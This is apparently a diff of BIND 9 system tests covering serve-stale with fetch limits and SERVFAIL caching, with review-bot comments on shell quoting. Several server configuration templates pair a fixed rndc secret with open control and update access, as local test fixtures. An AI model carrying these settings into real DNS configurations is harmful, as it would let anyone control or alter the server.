+sleep 4 + +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT comes from cache (stale-answer-client-timeout 0 stale-refresh-time 4) ($n)" +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +wait_for_log 5 "data.example stale answer used, an attempt to refresh the RRset" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT was refreshed (stale-answer-client-timeout 0 stale-refresh-time 4) ($n)" +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*[12].*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +#################################################################### +# Test serve-stale's interaction with fetch limits (cache only) # +################################################################# +echo_i "test serve-stale's interaction with fetch-limits (cache only)" + +# We update the named configuration to enable fetch-limits. The fetch-limits +# are set to 1, which is ridiciously low, but that is because for this test we +# want to reach the fetch-limits. +n=$((n+1)) +echo_i "updating ns3/named.conf ($n)" +ret=0 +copy_setports ns3/named6.conf.in ns3/named.conf +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc reload' ($n)" +ret=0 +rndc_reload ns3 10.53.0.3 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Disable responses from authoritative server. 
If we can't resolve the example +# zone, fetch limits will be reached. +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Allow RRset to become stale. +sleep 2 + +# Turn on serve-stale. +n=$((n+1)) +echo_i "running 'rndc serve-stale on' ($n)" +ret=0 +$RNDCCMD 10.53.0.3 serve-stale on || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.3 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: on (rndc) (stale-answer-ttl=3 max-stale-ttl=3600 stale-refresh-time=4)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Hit the fetch-limits. We burst the name server with a small batch of queries. +# Only 2 queries are required to hit the fetch-limits. The first query will +# start to resolve, the second one hit the fetch-limits. +burst() { + num=${1} + rm -f burst.input.$$ + while [ $num -gt 0 ]; do + num=`expr $num - 1` + echo "fetch${num}.example A" >> burst.input.$$ + done + $PERL ../ditch.pl -p ${PORT} -s 10.53.0.3 burst.input.$$ + rm -f burst.input.$$ +} + +wait_for_fetchlimits() { + burst 2 + # We expect a query for nx.example to fail because fetch-limits for + # the domain 'example.' (and everything below) has been reached. + $DIG -p ${PORT} +tries=1 +timeout=1 @10.53.0.3 nx.example > dig.out.test$n + grep "status: SERVFAIL" dig.out.test$n > /dev/null || return 1 +} + +n=$((n+1)) +echo_i "hit fetch limits ($n)" +ret=0 +retry_quiet 10 wait_for_fetchlimits || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Expect stale data now (because fetch-limits for the domain 'example.' 
(and +# everything below) has been reached. But we have a stale RRset for +# 'data.example/TXT' that can be used. +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT comes from cache (fetch-limits) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +wait_for_log 5 "data.example resolver failure, stale answer used" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# The previous query should not have started the stale-refresh-time window. +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT comes from cache again (fetch-limits) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +wait_for_log 5 "data.example resolver failure, stale answer used" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +######################################################################## +# Test serve-stale's interaction with fetch limits (dual-mode) # +######################################################################## +echo_i "test serve-stale's interaction with fetch limits (dual-mode)" + +# Update named configuration so that ns3 becomes a recursive resolver which is +# also a secondary server for the root zone. 
+n=$((n+1)) +echo_i "updating ns3/named.conf ($n)" +ret=0 +copy_setports ns3/named7.conf.in ns3/named.conf +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc reload' ($n)" +ret=0 +rndc_reload ns3 10.53.0.3 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Flush the cache to ensure the example/NS RRset cached during previous tests +# does not override the authoritative delegation found in the root zone. +n=$((n+1)) +echo_i "flush cache ($n)" +ret=0 +$RNDCCMD 10.53.0.3 flush > rndc.out.test$n 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Query name server with low fetch limits. The authoritative server (ans2) is +# not responding. Sending queries for multiple names in the 'example' zone +# in parallel causes the fetch limit for that zone (set to 1) to be +# reached. This should not trigger a crash. +echo_i "sending queries for tests $((n+1))-$((n+4))..." +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.3 othertype.example CAA > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.3 nxdomain.example TXT > dig.out.test$((n+4)) + +wait + +# Expect SERVFAIL for the entries not in cache. 
+n=$((n+1)) +echo_i "check stale data.example TXT (fetch-limits dual-mode) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale othertype.example CAA (fetch-limits dual-mode) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nodata.example TXT (fetch-limits dual-mode) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nxdomain.example TXT (fetch-limits dual-mode) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check DNS64 processing of a stale negative answer ($n)" +ret=0 +# configure ns3 with dns64 +copy_setports ns3/named8.conf.in ns3/named.conf +rndc_reload ns3 10.53.0.3 +# flush cache, enable ans2 responses, make sure serve-stale is on +$RNDCCMD 10.53.0.3 flush > rndc.out.test$n.1 2>&1 || ret=1 +$DIG -p ${PORT} @10.53.0.2 txt enable > /dev/null +$RNDCCMD 10.53.0.3 serve-stale on > rndc.out.test$n.2 2>&1 || ret=1 +# prime the cache with an AAAA NXRRSET response +$DIG -p ${PORT} @10.53.0.3 a-only.example AAAA > dig.out.1.test$n +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +grep "2001:aaaa" dig.out.1.test$n > /dev/null || ret=1 +# disable responses from the auth server +$DIG -p ${PORT} @10.53.0.2 txt disable > /dev/null +# wait two seconds for the previous answer to become stale +sleep 2 +# resend the query and wait in the background; we should get a stale answer +$DIG -p ${PORT} @10.53.0.3 a-only.example AAAA > dig.out.2.test$n & +# re-enable queries after a pause, so the server gets a real answer too +sleep 2 +$DIG -p ${PORT} @10.53.0.2 txt enable > /dev/null 
+wait +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "2001:aaaa" dig.out.2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################### +# Test serve-stale's interaction with prefetch processing # +########################################################### +echo_i "test serve-stale's interaction with prefetch processing" + +# Test case for #2733, ensuring that prefetch queries do not trigger +# a lookup due to stale-answer-client-timeout. +# +# 1. Cache the following records: +# cname.example 7 IN CNAME target.example. +# target.example 9 IN A <addr>. +# 2. Let the CNAME RRset expire. +# 3. Query for 'cname.example/A'. +# +# This starts recursion because cname.example/CNAME is expired. +# The authoritative server is up so likely it will respond before +# stale-answer-client-timeout is triggered. +# The 'target.example/A' RRset is found in cache with a positive value +# and is eligble for prefetching. +# A prefetch is done for 'target.example/A', our ans2 server will +# delay the request. +# The 'prefetch_done()' callback should have the right event type +# (DNS_EVENT_FETCHDONE). + +# flush cache +n=$((n+1)) +echo_i "flush cache ($n)" +ret=0 +$RNDCCMD 10.53.0.3 flushtree example > rndc.out.test$n.1 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# prime the cache with CNAME and A; CNAME expires sooner +n=$((n+1)) +echo_i "prime cache cname.example A (stale-answer-client-timeout 1.8) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 cname.example A > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "cname\.example\..*7.*IN.*CNAME.*target\.example\." 
dig.out.test$n > /dev/null || ret=1 +grep "target\.example\..*9.*IN.*A" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# wait for the CNAME to be stale; A will still be valid and in prefetch window. +# (the longer TTL is needed, otherwise data won't be prefetch-eligible.) +sleep 7 + +# re-enable auth responses, but with a delay answering the A +n=$((n+1)) +echo_i "delay responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt slowdown > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# resend the query and wait in the background; we should get a stale answer +n=$((n+1)) +echo_i "check prefetch processing of a stale CNAME target ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 cname.example A > dig.out.test$n & +sleep 2 +wait +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "cname\.example\..*7.*IN.*CNAME.*target\.example\." dig.out.test$n > /dev/null || ret=1 +grep "target\.example\..*[1-2].*IN.*A" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/setup.sh b/bin/tests/system/setup.sh new file mode 100644 index 0000000..1667acd --- /dev/null +++ b/bin/tests/system/setup.sh 
@@ -0,0 +1,34 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Run a system test. +# + +SYSTEMTESTTOP=. +. $SYSTEMTESTTOP/conf.sh + +test $# -gt 0 || { echo "usage: $0 test-directory" >&2; exit 1; } + +test=$1 +shift + +test -d $test || { echo "$0: $test: no such test" >&2; exit 1; } + +# Set up any dynamically generated test data +if test -f $test/setup.sh +then + ( cd $test && $SHELL setup.sh "$@" ) +fi + + diff --git a/bin/tests/system/sfcache/README b/bin/tests/system/sfcache/README new file mode 100644 index 0000000..91b2126 --- /dev/null +++ b/bin/tests/system/sfcache/README @@ -0,0 +1,19 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +The test setup for the SERVFAIL ncache tests has a secure root. + +ns1 is the root server. + +ns2 is an authoritative server for the various test domains. + +ns5 is a caching-only server, configured with the an incorrect trusted +key for the root. It is used for testing failure cases. diff --git a/bin/tests/system/sfcache/clean.sh b/bin/tests/system/sfcache/clean.sh new file mode 100644 index 0000000..e8bd818 --- /dev/null +++ b/bin/tests/system/sfcache/clean.sh 
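Review bot: In bin/tests/system/setup.sh the test directory taken from `$1` is expanded unquoted in `test -d $test`, `test -f $test/setup.sh` and `cd $test`, so a name containing whitespace or glob characters is word-split before the existence checks run. Quoting each use keeps the argument intact, e.g. `test -d "$test" || { echo "$0: $test: no such test" >&2; exit 1; }` and `( cd "$test" && $SHELL setup.sh "$@" )`. The unquoted `. $SYSTEMTESTTOP/conf.sh` is harmless only because the variable is set to `.` on the line before it.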
@@ -0,0 +1,27 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +rm -f ./*/K*.key ./*/K*.private ./*/*.signed ./*/*.db ./*/dsset-* +rm -f ./*/managed.conf ./*/trusted.conf +rm -f ./*/named.memstats +rm -f ./*/named.conf +rm -f ./*/named.run ./*/named.run.prev +rm -f ./dig.* +rm -f ./rndc.* +rm -f ./sfcache.* +rm -f ./ns*/managed-keys.bind* +rm -f ./ns*/named.lock +rm -f ./ns5/named.run.part* +rm -f ./ns5/named_dump* diff --git a/bin/tests/system/sfcache/ns1/named.conf.in b/bin/tests/system/sfcache/ns1/named.conf.in new file mode 100644 index 0000000..4a9822d --- /dev/null +++ b/bin/tests/system/sfcache/ns1/named.conf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/sfcache/ns1/root.db.in b/bin/tests/system/sfcache/ns1/root.db.in new file mode 100644 index 0000000..1deb998 --- /dev/null 
+++ b/bin/tests/system/sfcache/ns1/root.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example2. NS ns2.example2. +ns2.example2. A 10.53.0.2 diff --git a/bin/tests/system/sfcache/ns1/sign.sh b/bin/tests/system/sfcache/ns1/sign.sh new file mode 100644 index 0000000..d97b63d --- /dev/null +++ b/bin/tests/system/sfcache/ns1/sign.sh 
@@ -0,0 +1,38 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +zone=. +infile=root.db.in +zonefile=root.db + +(cd ../ns2 && $SHELL sign.sh ) + +cp "../ns2/dsset-example$TP" . + +keyname=$($KEYGEN -q -a "${DEFAULT_ALGORITHM}" -b "${DEFAULT_BITS}" -n zone $zone) + +cat "$infile" "$keyname.key" > "$zonefile" + +$SIGNER -P -g -o $zone $zonefile > /dev/null + +# Configure the resolving server with a static key. +keyfile_to_static_ds "$keyname" > trusted.conf +cp trusted.conf ../ns2/trusted.conf + +# ...or with an initializing key. +keyfile_to_initial_ds "$keyname" > managed.conf diff --git a/bin/tests/system/sfcache/ns2/example.db.in b/bin/tests/system/sfcache/ns2/example.db.in new file mode 100644 index 0000000..c035ee8 --- /dev/null +++ b/bin/tests/system/sfcache/ns2/example.db.in 
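Review bot: bin/tests/system/sfcache/ns1/sign.sh leaves `$KEYGEN`, `$SIGNER`, `$zone` and `$zonefile` unquoted, while ns2/sign.sh and ns5/sign.sh in this same commit quote every expansion. The three scripts should follow one convention, and the `# shellcheck source=conf.sh` directive suggests the file is meant to be linted. The two lines would read `keyname=$("$KEYGEN" -q -a "${DEFAULT_ALGORITHM}" -b "${DEFAULT_BITS}" -n zone "$zone")` and `"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null`. A short comment saying that `(cd ../ns2 && $SHELL sign.sh )` must run first, because the next line copies `dsset-example$TP` from ns2, would also help the next reader.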
@@ -0,0 +1,103 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 + +; Used for testing ANY queries +foo TXT "testing" +foo A 10.0.1.0 + +bad-cname CNAME a +bad-dname DNAME @ + +; Used for testing CNAME queries +cname1 CNAME cname1-target +cname1-target TXT "testing cname" + +cname2 CNAME cname2-target +cname2-target TXT "testing cname" + +; Used for testing DNAME queries +dname1 DNAME dname1-target +foo.dname1-target TXT "testing dname" + +dname2 DNAME dname2-target +foo.dname2-target TXT "testing dname" + +; A secure subdomain +secure NS ns.secure +ns.secure A 10.53.0.3 + +; An insecure subdomain +insecure NS ns.insecure +ns.insecure A 10.53.0.3 + +; A secure subdomain we're going to inject bogus data into +bogus NS ns.bogus +ns.bogus A 10.53.0.3 + +; A dynamic secure subdomain +dynamic NS dynamic +dynamic A 10.53.0.3 + +; A insecure subdomain +mustbesecure NS ns.mustbesecure +ns.mustbesecure A 10.53.0.3 + +; A rfc2535 signed zone w/ CNAME +rfc2535 NS ns.rfc2535 +ns.rfc2535 A 10.53.0.3 + +z A 10.0.0.26 + +keyless NS ns.keyless +ns.keyless A 10.53.0.3 + +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 + +optout NS ns.optout +ns.optout A 10.53.0.3 + +nsec3-unknown NS ns.nsec3-unknown +ns.nsec3-unknown A 10.53.0.3 + +optout-unknown NS ns.optout-unknown +ns.optout-unknown A 10.53.0.3 + +multiple NS ns.multiple +ns.multiple A 10.53.0.3 + 
+*.wild A 10.0.0.27 + +rsasha256 NS ns.rsasha256 +ns.rsasha256 A 10.53.0.3 + +rsasha512 NS ns.rsasha512 +ns.rsasha512 A 10.53.0.3 + +kskonly NS ns.kskonly +ns.kskonly A 10.53.0.3 diff --git a/bin/tests/system/sfcache/ns2/named.conf.in b/bin/tests/system/sfcache/ns2/named.conf.in new file mode 100644 index 0000000..2ec6675 --- /dev/null +++ b/bin/tests/system/sfcache/ns2/named.conf.in @@ -0,0 +1,49 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db.signed"; + allow-update { any; }; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/sfcache/ns2/sign.sh b/bin/tests/system/sfcache/ns2/sign.sh new file mode 100644 index 0000000..bbdf086 --- /dev/null +++ b/bin/tests/system/sfcache/ns2/sign.sh 
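Review bot: bin/tests/system/sfcache/ns2/named.conf.in combines a fixed rndc secret (`secret "1234abcd8765";`) with a control channel that has `allow { any; }` and a zone with `allow-update { any; };`, and nothing in the file marks these as test-fixture settings. A one-line comment above the `key` block, such as `// Test fixture: fixed rndc key and open ACLs, for the 10.53.0.x system-test addresses only.`, would keep the file from being reused as a template. The same key and open control channel appear in sfcache/ns5/named.conf.in and in shutdown/ns1 and shutdown/ns2 named.conf.in, which would take the same comment.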
@@ -0,0 +1,28 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +zone=example. +infile=example.db.in +zonefile=example.db + +keyname1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +keyname2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile" + +"$SIGNER" -P -g -o "$zone" -k "$keyname1" "$zonefile" "$keyname2" > /dev/null diff --git a/bin/tests/system/sfcache/ns5/named.conf.in b/bin/tests/system/sfcache/ns5/named.conf.in new file mode 100644 index 0000000..df3938b --- /dev/null +++ b/bin/tests/system/sfcache/ns5/named.conf.in 
@@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + servfail-ttl 30; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/sfcache/ns5/sign.sh b/bin/tests/system/sfcache/ns5/sign.sh new file mode 100644 index 0000000..40d7095 --- /dev/null +++ b/bin/tests/system/sfcache/ns5/sign.sh @@ -0,0 +1,21 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone ".") + +keyfile_to_static_ds "$keyname" > trusted.conf diff --git a/bin/tests/system/sfcache/setup.sh b/bin/tests/system/sfcache/setup.sh new file mode 100644 index 0000000..3e09fe9 --- /dev/null 
+++ b/bin/tests/system/sfcache/setup.sh
@@ -0,0 +1,24 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+
+cd ns1 && $SHELL sign.sh && cd ..
+cd ns5 && $SHELL sign.sh && cd ..
diff --git a/bin/tests/system/sfcache/tests.sh b/bin/tests/system/sfcache/tests.sh
new file mode 100644
index 0000000..4c47e08
--- /dev/null
+++ b/bin/tests/system/sfcache/tests.sh
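Review bot: In bin/tests/system/sfcache/setup.sh the line `cd ns1 && $SHELL sign.sh && cd ..` does not stop the script when sign.sh fails, because `set -e` ignores a failing command that is not the last one in an `&&` list. The script then carries on from inside ns1, and presumably only reports an error when the following `cd ns5` cannot be resolved there. Running each step in a subshell, as ns1/sign.sh already does for ns2, makes the failure immediate and leaves the working directory untouched: `( cd ns1 && $SHELL sign.sh )` and `( cd ns5 && $SHELL sign.sh )`.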
@@ -0,0 +1,108 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +status=0 +n=0 + +rm -f dig.out.* + +dig_with_opts() { + "$DIG" +tcp +noadd +nosea +nostat +nocmd -p "$PORT" "$@" +} + +rndc_with_opts() { + "$RNDC" -c "$SYSTEMTESTTOP/common/rndc.conf" -p "$CONTROLPORT" -s "$@" +} + +echo_i "checking DNSSEC SERVFAIL is cached ($n)" +ret=0 +dig_with_opts +dnssec foo.example. a @10.53.0.5 > dig.out.ns5.test$n || ret=1 +rndc_dumpdb ns5 -all +awk '/Zone/{out=0} { if (out) print } /SERVFAIL/{out=1}' ns5/named_dump.db.test$n > sfcache.$n +grep "^; foo.example/A" sfcache.$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking SERVFAIL is returned from cache ($n)" +ret=0 +dig_with_opts +dnssec foo.example. a @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking that +cd bypasses cache check ($n)" +ret=0 +dig_with_opts +dnssec +cd foo.example. 
